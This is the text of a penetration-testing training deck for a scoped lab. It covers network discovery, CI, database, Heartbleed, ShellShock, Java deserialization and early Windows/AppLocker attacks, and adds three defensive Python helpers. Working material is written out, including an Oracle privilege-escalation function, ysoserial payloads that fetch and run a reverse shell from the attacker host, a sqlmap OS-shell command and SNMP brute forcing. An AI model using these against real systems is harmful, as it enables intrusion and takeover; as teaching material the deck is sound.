Advanced Infrastructure Hacking
2018
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
About NotSoSecure
Specialist IT Security Company providing cutting-edge IT security consultancy and training
Pentest Services:
● Application Pentest
● Infrastructure Pentest
● Mobile Apps Pentest
● Source Code Review
● Red Team Assessment
● IoT review
Training:
● Advanced Infrastructure Hacking
● Web Hacking - Blackbelt Edition
● Basic Web Hacking
● Basic Infrastructure Hacking
● Appsec for Developers
● IoT Hacking
For private/corporate training please contact us at training@notsosecure.com
About The Trainer
Owen Shearing
● 13+ years a techie
● CREST CCT INF
● Runs @camsec (camsec.org)
● www.rebootuser.com / https://github.com/rebootuser
● @rebootuser
LAB Setup
Please refer to the related instructions for further details:
• Step 1
– Initiate a connection to the Hacklab VPN
– Use the credentials provided
• Step 2
– Make sure you can reach the Internet after connecting to the VPN
• Step 3
– Refill your coffee!
LAB Setup: Configuration Check
• Confirm your VPN connection is working
• Confirm you can login via SSH to your 192.168.X.206 Kali Linux instance
• Change your Kali ‘root’ password to ensure no one can access your Kali VM
• Confirm you can ping 192.168.3.215 and that you can still reach the Internet from your laptop
LAB Setup: Scope
Targets for Hacking:
– 192.168.3.0/24: shared subnet network
– 192.168.X.0/24: X being your userID
Not in scope:
– 192.168.4.0/24, 192.168.5.0/24
– Any attacks on these networks will result in disqualification from the training
Delegate Agreement
Things that could result in disqualification:
• Any DoS activity (such as shutdown/reboot etc.)
• Playing with hosts that are not in scope (including targets not belonging to you)
• Any IP/MAC spoofing activity
Have fun and let others have fun too! ☺
The Art of Making Notes
• Save your notes (especially tool output - it can be a lifesaver)
• Refer to your notes when you get stuck!
• Good notes may get you uid=0(root)!
Syllabus
Networking/CI/Database & Popular Vulnerabilities:
– IPv4 & IPv6 & Host Discovery
– OSINT & DVCS / CI-CD Exploitation
– Database Servers
– Popular Vulnerabilities
Windows:
– Enumeration
– AppLocker Bypasses
– Privilege Escalation
– Post Exploitation
– Active Directory Delegation
– Lateral Movement
– Persistence Techniques
Unix:
– Unix Exploitation
– NFS Attacks
– Shell Escapes
– SSH Tunneling
– Web Server Hacks
– X11 Hacks
– Privilege Escalation
Specialist:
– Docker Exploitation
– VPN Exploitation
– VoIP Exploitation
– VLAN Exploitation
Module 1
IPv4 / IPv6 Refresher & Host Discovery
ARP Introduction
• Address Resolution Protocol
• A layer 2 protocol
• ARP is a protocol used to map IPv4 addresses to hardware (MAC) addresses
Example of an ARP request/response:
• IPv4 networks cannot function without ARP...
Port Scanning
• TCP / UDP Ports (0-65535)
• Specific services are configured to listen on specific ports, i.e. HTTP listens on port 80 by default
• However, services can be configured to listen on non-default ports
• Introducing nmap, a versatile port scanner
nmap -n -vvvv -sT -p0-65535 -A -iL live_host.txt -oA nmap_scan
nmap -n -vvvv -Pn -sU -F -iL live_host.txt -oA nmap_udp_scan
Exercise | Demo 1.1
• Perform an arp-scan on the following two networks and identify the live hosts:
– 192.168.3.0/24
– 192.168.X.0/24
• Identify open ports on each of the hosts identified during the previous question (both TCP and UDP)
• Identify the host operating system details as well as version details of the listening services
Network Status: After Nmap scan
IPv6 Basics
Overview:
• 128-bit (x4 the size of IPv4)
• 8 x 16-bit segments delimited by colons : when in hex format
Example: fe80:0000:0000:0000:e4df:8497:0b8d:bfd9
Reduction:
• Leading 0’s can be removed from the start of a segment
• A run of consecutive all-zero segments can be compressed to (::) - but only once per address!
Full IPv6: fe80:0000:0000:0000:e4df:8497:0b8d:bfd9
Compressed: fe80::e4df:8497:b8d:bfd9
IPv6 Basics
Useful to know:
• Localhost ::1/128 (~ 127.0.0.1)
• Link-Local Unicast Addresses FE80::/10 (*generated from the MAC address)
• Unique Local Unicast Addresses (ULA) FC00::/7
• Global Unicast Addresses 2000::/3
• 6to4: Mapping IPv4 over IPv6
– 2002:V4ADDR::V4ADDR (Windows)
– 2002:V4ADDR::1 (Linux)
Link Local Generation logic:
FE80::2<vendor_prefix>FF:FE<REMAINING_MAC_ID>
(FF:FE is inserted in the middle of the MAC and the universal/local bit of the first octet is flipped, which is where the leading 2 comes from)
*OS dependent
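As an added example (not code from the course materials), the two reduction rules and the link-local construction above, implemented in Python. The MAC 00:50:56:9f:0a:84 is a constructed input chosen so the result matches the fe80::250:56ff:fe9f:a84 address used in the later socat example; the standard library's ipaddress module is used only to cross-check the hand-written compressor.

```python
import ipaddress


def compress_ipv6(full: str) -> str:
    """Apply the two reduction rules to a full 8-segment address:
    1. strip leading zeros from every 16-bit segment;
    2. replace the longest run of two or more all-zero segments with '::',
       exactly once (on a tie the first run wins, as RFC 5952 requires)."""
    segs = full.lower().split(":")
    if len(segs) != 8:
        raise ValueError("expected a full address with 8 colon-delimited segments")
    segs = [s.lstrip("0") or "0" for s in segs]  # rule 1

    best_start, best_len = -1, 0
    i = 0
    while i < 8:  # rule 2: locate the longest run of zero segments
        if segs[i] != "0":
            i += 1
            continue
        j = i
        while j < 8 and segs[j] == "0":
            j += 1
        if j - i > best_len:
            best_start, best_len = i, j - i
        i = j
    if best_len < 2:  # a lone zero segment is written '0', never '::'
        return ":".join(segs)
    left = ":".join(segs[:best_start])
    right = ":".join(segs[best_start + best_len:])
    return f"{left}::{right}"


def link_local_from_mac(mac: str) -> str:
    """Modified EUI-64 link-local address, FE80::2<vendor>FF:FE<rest>:
    insert FF:FE between the OUI and the device half of the MAC, then flip
    the universal/local bit (0x02 of the first octet), so a leading 00
    becomes 02. The mac argument is a constructed sample input."""
    octets = [int(o, 16) for o in mac.replace("-", ":").split(":")]
    if len(octets) != 6:
        raise ValueError("expected a 48-bit MAC address")
    eui = octets[:3] + [0xFF, 0xFE] + octets[3:]
    eui[0] ^= 0x02
    iid = [(eui[k] << 8) | eui[k + 1] for k in range(0, 8, 2)]
    full = "fe80:0000:0000:0000:" + ":".join(f"{x:04x}" for x in iid)
    return compress_ipv6(full)


def agrees_with_stdlib(full: str) -> bool:
    """Cross-check the hand-written compressor against ipaddress."""
    return compress_ipv6(full) == ipaddress.IPv6Address(full).compressed


if __name__ == "__main__":
    print(compress_ipv6("fe80:0000:0000:0000:e4df:8497:0b8d:bfd9"))
    print(link_local_from_mac("00:50:56:9f:0a:84"))
```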
IPv6 Basics
• Unicast - a single IP assigned to a single network interface
• Multicast (FF00::/8) - multiple network interfaces (hosts)
– All nodes: FF02::1
– All routers: FF02::2
• Anycast (taken from the Global Unicast pool and therefore impossible to distinguish based on format alone) - multiple network interfaces (hosts), but only a single network interface (host) needs to respond
IPv6 Neighbor Discovery Protocol (NDP)
Router Discovery:
• Used to locate routers on the same link using ICMPv6
– Router Solicitation (type 133) is sent from a node to the all-routers multicast group
– Router Advertisement (type 134) is sent from routers to the all-nodes multicast group
• Prefix information (type 3) can be included within the Router Advertisement, which lists IPv6 prefixes (subnets) that are reachable
IPv6 Neighbor Discovery Protocol (NDP)
Address Resolution:
• Similar (from a pentester’s POV) to ARP in IPv4
• Used to locate link layer addresses of neighbor systems using ICMPv6
– Neighbor Solicitation (type 135) multicast is sent from a node requesting the link layer address of a neighbor system
– Neighbor Advertisement (type 136) is sent from the ‘owner’ (if online) and responds with its link layer address
• Only the factors useful for pentesting are covered here
Full details @ https://tools.ietf.org/html/rfc4861
IPv6 Neighbor Discovery Protocol (NDP)
• Neighbor Solicitation (type 135)
• Neighbor Advertisement (type 136)
SNMP: Simple Network Management Protocol
• Listens on UDP port 161 by default
• Versions 1, 2c and 3 exist
• Used to manage and collect information from network devices
• SNMP queries objects for information.
• These objects are identified via Object Identifiers (OIDs)
SNMP OID Values
• OIDs are structured in a hierarchical tree and can be queried for specific information
Example:
To obtain system info: 1.3.6.1.2.1.1
To obtain usernames: 1.3.6.1.4.1.77.1.2.25.1.1
Image Reference: http://www.networkmanagementsoftware.com/snmp-tutorial-part-2-rounding-out-the-basics/
SNMPv1/2c Overview
• 1 and 2c offer no authentication or encryption capabilities
• Community string required to query or alter the configuration
• Default community strings include:
– public: A user can request information from the device
– private: A user may modify the device configuration
Example:
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 192.168.3.100
Scanning 1 hosts, 49 communities
192.168.3.100 [xxxxx] Linux turnkey-oracle-xe-11g 2.6.32-5-amd64 #1 SMP
SNMPv3 Overview
• Mainly a security enhancement release
• User-based Security Model (USM) and View-based Access Control Model (VACM)
• New additions
– Security Name: Username
– Security Level: NoAuthNoPriv, AuthNoPriv, AuthPriv
– Auth: MD5 or SHA1
– Priv: DES or AES
SNMPv3 Online Attack
• Bruteforce tools such as onesixtyone or patator won’t work over IPv6
• snmpget auto detects the correct version of SNMP and performs requests
• Let's build a quick and dirty bruteforce tool:
for i in $(cat /usr/share/doc/onesixtyone/dict.txt); do echo -n "$i: "; snmpget -v 3 -u "$i" udp6:[IPv6] MIB_TO_FETCH; done
Exercise | Demo 1.2
• Identify various devices listening on an IPv6 address
• Perform a port scan on all IPv6 devices and identify open ports
• Connect to an identified SNMP Server running on IPv6 and extract sysContact (1.3.6.1.2.1.1.4.0) information
Extra: IPv4 Tools Over IPv6
• socat
socat -v tcp4-listen:22,fork tcp6-connect:[fe80::250:56ff:fe9f:a84]:22
• netsh
netsh interface portproxy add v4tov6 listenport=22 connectaddress=fe80::250:56ff:fe9f:a84 connectport=22 protocol=tcp
• Then target the local interface!
Network Status: After IPv6 Scan
Module 2
OSINT and DVCS / CI-CD Exploitation
ImageRef: https://i0.wp.com/www.d3lab.net/wp-content/uploads/2016/04/Cloud-OSINT.png?w=967&ssl=1
Information Gathering Methods & Sources
• Open-source intelligence (OSINT) is intelligence collected from publicly available sources
• With Web 2.0+, information gathering can be both easy and complex!
– Easy: Everyone wants to show everyone what they are doing
– Complex: Information overload!
• OSINT Sources
– Search Engines (Google | Bing)
– Dedicated Engines (Shodan, ZoomEye)
– Public Directories (Domain / Company Registrars)
– Social Media (FB, LinkedIn)
– Public Pastes (Pastebin, Pastie)
OSINT: Examples
• Google Hacking: crafting search queries to get juicy information
inurl:github.com intitle:config intext:"/msg nickserv identify"
ext:xls intext:NAME intext:TEL intext:EMAIL intext:PASSWORD
• Shodan: Server Banners
country:US port:23 asn:ASN123456 cisco
• Domain WhoisInfo
$ whois domainname.tld
OSINT: Examples
Exercise | Demo 2.1
• Enumerate the online presence for the domain identified in Exercise 1.2
• Identify various employees of the company
• Identify leaked credentials
• Identify remote access details
Distributed Version Control Systems
• Distributed / Decentralized: everyone has the full version history locally
• Git / Mercurial and many more
• Git is becoming the most popular (GitHub uses git in the backend)
• This system allows developers to work in isolation as well as continue working even if connectivity is lost
• Access could be via HTTP based login or via SSH based access
• One drawback: generally this results in out-of-sync work by multiple developers
CI / CD Process
Jenkins (CI Server)
Programmers commit Code merges to Builds and deploys it to
Application is deployed
code to the personal mainline(Git) after test/(pre-)production
to production
repository certain checks after running some
optional test cases
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Attacker Process
Developer Machine Security Git Repository Security CI Server Security Production Server Security
Leakage of Source Code Leakage of Source Code Backdoor planting Instant compromise if previous
Source Code Repository Access steps had flaws
Access credentials of Repository
Access to (pre-)production
environment if auto deploy is
enabled
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Exercise | Demo 2.2
• Identify a weak configuration on the CI Server
• Obtain access to the repository
• Upload a webshell and execute OS commands on the server
Network Status: After CI Exploitation
Module 3
MySQL, Postgres and Oracle
Attacking MySQL
● MySQL is widely used, which makes it an attractive target
● Listens on TCP port 3306 by default
● Typically secured by default with network access controls and built-in ACLs
● Vulnerabilities:
○ BACKRONYM (SSL Downgrade - 2015)
○ Remote Authentication Bypass (2012)
○ SQL injection attacks
○ Abusing Management Console access (such as phpMyAdmin)
○ Brute force attack if a direct connection is possible
● The root user of MySQL is almost always present and not configured to lock out by default
MySQL Exploitation
• Getting access to a database is just the beginning
• Various attacks can be performed depending on privileges
• FILE* privilege allows the user to read files on the server
select LOAD_FILE('/etc/passwd');
• Database credentials location: mysql.user table
select * from mysql.user;
*Note: It’s always worth checking if your database account has the FILE privilege. The MySQL root user has this access...
Postgres Exploitation
• Listens on TCP port 5432 by default
• Default configuration is limited to localhost
• Default user: postgres
• UDF injection allows OS code execution as the postgres user
sqlmap -d postgres://postgres:password@192.168.X.X:5432/postgres --os-shell
Oracle
To connect to an Oracle database, you need the following:
• IP:port (default port 1521)
– use Nmap for this
• SID (database name)
– use odat here
• Credentials
– use odat here
Oracle: The Real World
• Typically you will be able to connect to Oracle as an unprivileged account such as SCOTT/TIGER
• After connecting you may want to:
– Escalate privileges to become DBA
– With DBA privs execute OS code
Hacking Oracle For Fun & Pr0fit: #1 & #2
#1: Identify SID
odat-libc2.5-x86_64 sidguesser -s 192.168.3.100
[1.1] Searching valid SIDs thanks to a well known SID list on the 192.168.3.100:1521 server
[+] 'XE' is a valid SID. Continue...
[+] 'XEXDB' is a valid SID. Continue...
#2: Identify default account(s)
odat-libc2.5-x86_64 passwordguesser -d XE -s 192.168.3.100
[+] Valid credentials found: SCOTT/TIGER. Continue...
100% |##########| Time: 00:00:15
[+] Accounts found on 192.168.3.100:1521/XE: {'SCOTT': 'TIGER'}
Hacking Oracle For Fun & Pr0fit: #3
Connect** to the Oracle database with the credentials identified and verify your user privileges:
select * from session_privs
** We recommend using an external tool called RazorSQL (www.razorsql.com) for connecting to the database. You can download a FREE 30 day trial from the RazorSQL website.
Hacking Oracle For Fun & Pr0fit: #4
Vectors for privilege escalation attacks against Oracle:
• Missing security patches
• Poorly written custom PL/SQL code
• 0 day
Oracle: Vulnerabilities CPU Jan 2015
Vulnerability: the PUBLIC role has the INDEX privilege on the SYS.DUAL table
Exploit:
➔ Create a malicious function as our low privileged user
➔ Create an index on SYS.DUAL which will execute this function
➔ Query SYS.DUAL
➔ The function will now be executed as SYS
http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf
Hacking Oracle: Demo
CREATE your ‘malicious’ function:
CREATE OR REPLACE FUNCTION GETDBA_X (FOO varchar) return varchar
deterministic authid current_user is
pragma autonomous_transaction;
begin
execute immediate 'grant dba to userx identified by userx';
commit;
return 'FOO';
end;
Create an index on sys.dual referencing your function:
create index exploit_index_X on SYS.DUAL(SCOTT.GETDBA_X('BAR'));
Hacking Oracle: Demo Continued...
Query Dual to execute your exploit:
select user from sys.dual;
Login as:
userx/userx (DBA user)
Hacking Oracle For Fun & Pr0fit: #5
Attack vectors for OS code execution:
• Using Java (XE version does not come with Java)
• Using DBMS_scheduler (universal)
** There are other methods available for executing OS code. Please refer to the Oracle Hacker’s Handbook for more detail.
Hacking Oracle: OS Code Execution
Exercise | Demo 3.1
• Identify a default account within the Oracle database and connect
• Identify the privileges this user has
• Escalate privileges and obtain DBA access
• Using this privileged access, execute OS code and obtain interactive ‘shell’ access as the Oracle user
NoSQL Server
• Non relational in nature
• Used for unstructured data storage
• Storage format: Key-value, document, wide-column, graph
• Currently in its adoption stage (infancy)
• Popular programs: Mongo, Cassandra, Couch, Redis and more
• Plagued with basic issues:
– No Authentication required by default (default is limited to localhost)
– Plain text communication channel between client and server
– Plaintext data storage / lack of data encryption
MongoDB
• By default listens on 127.0.0.1:27017
• Storage: Document
• No auth required by default
• Client tools: mongo on linux command line or RazorSQL or Robo3T GUI
*https://blog.shodan.io/its-the-data-stupid/
*https://www.mongodb.com/blog/post/how-to-avoid-a-malicious-attack-that-ransoms-your-data#suggested-steps
MongoDB vs RDBMS
Common Commands
List of databases
• show dbs
List of collections
• show collections
Use a specific database
• use <dbName>
Add data to a collection
• db.<collection>.insert({name:'ABC',role:'Admin',codes:[10,17,19]})
Find and print data
• db.<collection>.find()
• db.<collection>.find().pretty()
Database Exploitation Summary
• Databases can often be overlooked while performing a network pentest
• However, they provide an attack surface which can aid an attacker
• Most databases on Windows will run as the privileged SYSTEM account; OS code execution could lead to further avenues of attack
Network Status: After DB Exploitation
Module 4
Popular Vulnerabilities
SSL/TLS Flaws
• Official name: TLS (Transport Layer Security)
• Multiple versions in place:
– SSLv2
– SSLv3
– TLS 1.0
– TLS 1.1
– TLS 1.2 (most recent)
– TLS 1.3 (in draft stage)
• Historically one of the most attacked layers:
– Heartbleed
– POODLE
– Lucky13
– Apple GOTO Fail
– FREAK / MS15-031
– DROWN
HeartBleed
• Upon successful exploitation it is possible to read arbitrary data from the memory of the target
• A missing bounds check: up to (a maximum of) 64kb of data is returned per request
• A flaw in the heartbeat request (connection check)
• Affected OpenSSL 1.0.1 to 1.0.1f for TLS 1.0, 1.1, and 1.2
[Figure: TLS Heartbleed request and response between client and server]
– Request: “If you are alive respond with ‘abc’”, claimed length 30000; request length = 30000, actual length = 3
– Response: abc<junkdata>APIKEYS<junk><password><junk><userid>PRIVATEKEYOR<more>, data="abc", len=30000, response length 30000
– The extra bytes are data on the server which you should not have access to at all; this data is used by the server and includes the SSL certificate private key
HeartBleed: Exploitation
ShellShock
• Another named vulnerability
• Affects any system which allows command execution via Bash
• A bug in the parsing of input (function definitions passed through environment variables)
• Affects remote script parsing such as CGI
• Affected all Bash versions up to 4.3
Example:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
– x is defined from ' to ', i.e. x='() { :;}; echo vulnerable'
– echo vulnerable should be part of the function definition, but is executed when bash imports the variable
ShellShock: Examples
● Vulnerable Code
● Patched Code (Kali X.206)
LAB Time Challenges (4.1)
• Identify a way to access the administrative interface on 192.168.3.180
• Once access to the administrative interface is obtained, identify ways to gain shell access to the system
Network Status: After Heartbleed & ShellShock
Data Serialization and Deserialization Attacks
• What is Serialization?
– A means of translating data from one form to another
– Used for the storage or transmission of data across a network
Serialization is everywhere
• Almost all languages have support for serialization
– Java
– PHP
– .NET
– COM
– Ruby
– Python
– All other OOP based languages
• Almost all of them have had bugs in deserialization routines which could lead to Remote Code Execution.
Java Serialization Vulnerability
• Another issue which got little media attention
• Publicly disclosed on 28 January 2015
• PoC published on 06 November 2015
• Fix issued from 10 November 2015 onwards
• CVE-2015-4852
PoC: http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
Slides: http://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles
Java Serialization: How to Detect
• Serialized objects are generally sent across in base64 format. Look for “rO0AB” (if base64 encoded) or, if a ‘raw’ binary is passed, look for the hex string “AC ED 00 05 73 72” in requests and responses
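An added example (not part of the course materials): a small Python scanner that applies the detection rule above to a request or response body, confirming base64 candidates by decoding them rather than trusting the “rO0AB” prefix alone. The HTTP bodies and the ExampleBean class name are constructed sample input, not captured traffic.

```python
import base64
import re

# Java ObjectOutputStream header: STREAM_MAGIC (0xACED) + STREAM_VERSION (5).
JAVA_STREAM_MAGIC = bytes.fromhex("aced0005")
# TC_OBJECT ('s') followed by TC_CLASSDESC ('r'): a new object carrying its
# own class descriptor, i.e. the "73 72" in AC ED 00 05 73 72.
TC_OBJECT_CLASSDESC = b"sr"
# Base64 of AC ED 00 05 always begins with "rO0AB", whatever byte follows.
B64_CANDIDATE = re.compile(rb"rO0AB[A-Za-z0-9+/=]*")


def classify(stream: bytes) -> str:
    """Distinguish a bare stream header from one that starts an object."""
    return "object stream" if stream[4:6] == TC_OBJECT_CLASSDESC else "stream header"


def scan_for_java_serialization(payload: bytes):
    """Return (offset, description) for every Java serialization stream in a
    body, raw or base64-encoded. A base64 candidate is reported only if the
    decoded bytes really start with the magic, so a stray "rO0AB" inside
    unrelated text is not enough to trigger a finding."""
    findings = []
    for m in re.finditer(re.escape(JAVA_STREAM_MAGIC), payload):
        findings.append((m.start(), "raw " + classify(payload[m.start():])))
    for m in B64_CANDIDATE.finditer(payload):
        blob = m.group(0).rstrip(b"=")
        if len(blob) % 4 == 1:  # no valid base64 string has this length
            continue
        try:
            raw = base64.b64decode(blob + b"=" * (-len(blob) % 4))
        except ValueError:  # binascii.Error is a ValueError
            continue
        if raw.startswith(JAVA_STREAM_MAGIC):
            findings.append((m.start(), "base64 " + classify(raw)))
    return sorted(findings)


# Constructed sample traffic (not captured from any real system).
SAMPLE_OBJECT = JAVA_STREAM_MAGIC + b"sr" + b"\x00\x0bExampleBean" + bytes(8)
SAMPLE_FORM_BODY = (
    b"POST /app/submit HTTP/1.1\r\nHost: app.example.test\r\n\r\n"
    b"state=" + base64.b64encode(SAMPLE_OBJECT) + b"&csrf=abc123"
)
SAMPLE_RAW_BODY = (
    b"POST /app/invoke HTTP/1.1\r\n"
    b"Content-Type: application/x-java-serialized-object\r\n\r\n" + SAMPLE_OBJECT
)
# Has the prefix but decodes to AC ED 00 07 ..., so it must not be reported.
SAMPLE_DECOY = b"token=rO0ABzzz&x=1"

if __name__ == "__main__":
    for name, body in (("form", SAMPLE_FORM_BODY), ("raw", SAMPLE_RAW_BODY),
                       ("decoy", SAMPLE_DECOY)):
        print(name, scan_for_java_serialization(body))
```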
Java Serialization: How to Attack
• We need to send the attack in serialized payload format
• ysoserial: A proof of concept tool to generate serialized payloads
• Sometimes the remote server might not have nc for reverse shell
– /root/Tools/common-collection-exploit/test.txt is a Perl reverse shell
– Other reverse shell one-liners on pentest monkey could be used
• If you use file based shell, you can deliver the reverse shell using wget / curl
Java Serialization: Payload Generation
• Create the payload to retrieve the Perl code from Kali:
java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'wget http://192.168.X.206/test.txt -O /tmp/test.pl' > payload_wget.bin
• Create the payload that will call the Perl code and give us shell access:
java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'perl /tmp/test.pl 192.168.X.206 9999' > payload_exe.bin
Java Serialization: Exploit Delivery #1
Java Serialization: Exploit Delivery #2
LAB Time Challenges (4.2)
• Identify a vulnerability in a service running on 192.168.3.150
• Obtain a reverse shell by exploiting the identified vulnerability
Network Status: After Serialization Exploitation
Module 5
Hacking Windows
Agenda
• Host/User Enumeration
• AppLocker/GPO Bypass Techniques
• Privilege Escalation
• Post Exploitation
– Antivirus\AMSI Bypass Techniques
– Exfiltration of Data and Secrets
• Active Directory Delegation Enumeration and Pwnage
• Remote Services, Pivoting and Lateral Movement in a Network
• Persistence
– Golden Ticket and DCSync
– Reviewing other methods
Enumeration #1
Useful Services
Port/Protocol - Description
● 88 TCP and UDP - Network authentication
● 135/TCP and 135/UDP (RPC EPM) - MS RPC endpoint mapper (DCE locator service); similar to the Sun RPC port mapper; services such as Outlook, Exchange and the messenger service use this
● 137/UDP and 138/UDP - NetBIOS browser, naming and lookup functions
– 137/UDP - Browsing requests of NetBIOS over TCP/IP, e.g. name lookup requests for file sharing, printers, SQL named pipes, WINS proxy, etc.
– 138/UDP - Browsing datagram responses of NetBIOS over TCP/IP, e.g. the NetLogon service (see services.msc)
● 139 and 445 - File sharing (CIFS)
NetBT Name Resolution
• NetBT || NetBIOS over TCP/IP || NBT
• NetBIOS over TCP/IP is the network component that performs computer name to IP address mapping and name resolution (netbt.sys or vnbt.sys)
• A legacy protocol used for backward compatibility
• Can be queried using the built-in Windows utility nbtstat (nmblookup on Linux)
– Windows: nbtstat -a <ip>
– Linux: nmblookup -A 192.168.3.215
• A response of 1C denotes that the host is a Domain Controller (a list of NetBIOS suffixes @ https://technet.microsoft.com/en-us/library/cc961921.aspx)
User Enumeration: The Past...
• Depending on the version of OS being targeted (and/or the settings defined within the security policy) a lot of data may be retrieved - even from a null session!
• A NULL session == blank user name and a blank password:
– Windows: net use \\IP_ADDRESS\ipc$ "" /user:""
– Linux: rpcclient -U "" IP_ADDRESS
• Domain controllers ≤ Windows 2003 are very forthcoming with supplying this data
SIDs and RIDs
• Unique and assigned sequentially by the local system or, if a domain user, a domain controller
• Before you can enumerate users, you need to have knowledge of the domain or local computer identifier
S-1-5-21-2000478354-1708537768-1957994488-500
– S: Identifies the value as a SID
– 1: The revision level/version of the specification
– 5: The top-level authority that issued the SID
– 21: SECURITY_NT_NON_UNIQUE, indicates a domain id will follow
– 2000478354-1708537768-1957994488: The domain or local computer identifier that issued the SID
– 500: The RID
Well known security identifiers list: https://support.microsoft.com/en-us/kb/243330
User Enumeration: Today
• What if we have:
– No null session
– No password
– Now what?
• User Enumeration via Kerberos:
– Non-existent account: KDC_ERR_C_PRINCIPAL_UNKNOWN
– A locked or disabled account: KDC_ERR_CLIENT_REVOKED
– A valid account: KDC_ERR_PREAUTH_REQUIRED
• The prerequisite: We need to have a list of possible usernames to throw at the server
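An added, defender-side example that is not part of the course: the three KDC responses listed above, seen from the domain controller's side, are exactly what a username list thrown at the server leaves behind. The Python below flags a client that requests tickets for many non-existent principals within a short window and lists the accounts the same client confirmed to exist. The CSV layout (timestamp, event id, account, client address, result code) is a constructed, simplified export of event 4768, not a real Windows log format; the result codes are the RFC 4120 values as Windows writes them.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Kerberos error codes (RFC 4120) as they appear in the Result Code field
# of event 4768 (TGT request).
KRB_ERRORS = {
    0x06: "KDC_ERR_C_PRINCIPAL_UNKNOWN",  # the account does not exist
    0x12: "KDC_ERR_CLIENT_REVOKED",       # account is locked or disabled
    0x19: "KDC_ERR_PREAUTH_REQUIRED",     # account exists, pre-auth needed
}

# Constructed, simplified CSV export of 4768 events (sample data only):
# timestamp,event_id,account_name,client_address,result_code
SAMPLE_EVENTS = """\
2018-05-14T09:00:01,4768,alice,192.0.2.7,0x19
2018-05-14T09:00:05,4768,alice,192.0.2.7,0x0
2018-05-14T09:12:00,4768,administrator,192.0.2.50,0x19
2018-05-14T09:12:00,4768,jsmith,192.0.2.50,0x6
2018-05-14T09:12:01,4768,bob,192.0.2.50,0x19
2018-05-14T09:12:01,4768,mjones,192.0.2.50,0x6
2018-05-14T09:12:02,4768,svc_backup,192.0.2.50,0x12
2018-05-14T09:12:02,4768,awilliams,192.0.2.50,0x6
2018-05-14T09:12:03,4768,kbrown,192.0.2.50,0x6
2018-05-14T09:12:03,4768,ldavis,192.0.2.50,0x6
2018-05-14T09:12:04,4768,jsmith,192.0.2.50,0x6
2018-05-14T09:12:05,4768,rmiller,192.0.2.50,0x6
2018-05-14T10:40:00,4768,carol,192.0.2.9,0x6
"""


def parse_events(text: str):
    """Parse the constructed CSV into dicts, keeping only 4768 events."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, account, addr, code = line.split(",")
        if event_id != "4768":
            continue
        events.append({
            "ts": datetime.fromisoformat(ts),
            "account": account.lower(),
            "addr": addr,
            "code": int(code, 16),
        })
    return events


def detect_user_enumeration(events, window=timedelta(minutes=5), threshold=5):
    """Flag every client that requested TGTs for at least `threshold`
    distinct non-existent principals (0x6) inside `window`. Any other
    result the same client collected in that window came back only for
    accounts that exist, so those names are reported as confirmed."""
    by_addr = defaultdict(list)
    for e in events:
        by_addr[e["addr"]].append(e)

    alerts = {}
    for addr, evs in by_addr.items():
        evs.sort(key=lambda e: e["ts"])  # stable: ties keep log order
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            span = evs[start:end + 1]
            unknown = {e["account"] for e in span if e["code"] == 0x06}
            seen = alerts.get(addr, {}).get("unknown_accounts", 0)
            if len(unknown) >= threshold and len(unknown) > seen:
                alerts[addr] = {
                    "unknown_accounts": len(unknown),
                    "first_seen": span[0]["ts"].isoformat(),
                    "confirmed_existing": {
                        e["account"]: KRB_ERRORS.get(e["code"], hex(e["code"]))
                        for e in span if e["code"] != 0x06
                    },
                }
    return alerts


def run_sample():
    return detect_user_enumeration(parse_events(SAMPLE_EVENTS))


if __name__ == "__main__":
    for addr, alert in run_sample().items():
        print(addr, alert)
```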
User Enumeration: Kerberos
User Enumeration: Recent Developments
• SensePost - May 2018
• New methods to perform unauthenticated user enumeration
– https://sensepost.com/blog/2018/a-new-look-at-null-sessions-and-user-enumeration/
– https://github.com/sensepost/UserEnum
• Methods (all require a pre-populated list of usernames):
– DsrGetDcNameEx2
– CLDAP (Connectionless LDAP) Ping
• UDP packet (fast)
• Response codes indicate existence of account - 23 (true) or 25 (false)
– NetBIOS MailSlot Ping
• Response codes indicate existence of account - 23 (true) or 25 (false)
Level Up!
• We have a list of valid accounts, now what?
• Password guessing:
– Most domain accounts will be influenced by a defined password policy
– Account lockout is usually configured
– Unless you can view password policy details we wouldn’t recommend testing more than 3 passwords per unique account
• Tie in with OSINT activities - any hints, personal information or naming conventions?
Exercise | Demo 5.1
• There is a Windows domain within the 192.168.3.X/24 network, what is the name?
• Using data gathered during earlier OSINT activities, find valid user accounts on the identified domain
• Gain RDP access to a workstation within the range 192.168.X.0/24 using one of the identified accounts
Windows Exploitation Status
● Domain controller for plum.local
● Host is a member of plum.local
● Through enumeration we found plum\bob is a valid account
AppLocker & Group Policy Restrictions
AppLocker
“...AppLocker advances the application control features and functionality
of Software Restriction Policies. AppLocker contains new capabilities and
extensions that allow you to create rules to allow or deny applications
from running based on unique identities of files and to specify which users
or groups can run those applications…”
[source] What is AppLocker: https://technet.microsoft.com/en-us/library/ee424367(v=ws.11).aspx
AppLocker: Overview
• Rules can be defined that control the following:
– Applications
– Scripts
– Installers
– DLL’s
– Packaged Applications
• Conditions can be based upon the following:
– Publisher (i.e. software signed by a specific vendor)
– Path
– File Hash
• Allow/Deny actions can be assigned to a user/group
AppLocker: Overview
• Create Default Rules - Mainly based upon Path (esp. exe and script rules)
[Further Information] https://technet.microsoft.com/en-us/library/ee460941(v=ws.11).aspx
AppLocker: Enumeration
• Rules can be heavily customised
• Therefore something that works in 1 environment, may not in the next!
• Generally an exe rule will dictate which programs can/can’t be run (probably based
on path as this is the default configuration and is relatively unobtrusive/easy to
manage)
• If we have access to PowerShell/cmd our job, in regards to enumeration, becomes
easier
AppLocker: Enumeration
• Generating ‘Create Default Rules’ means only programs in the following locations
will execute:
– Program Files directories (32 and 64 bit)
– Windows directory
– Anything elsewhere == nope!
• If we can write to a location that permits execution, we may be able to get access
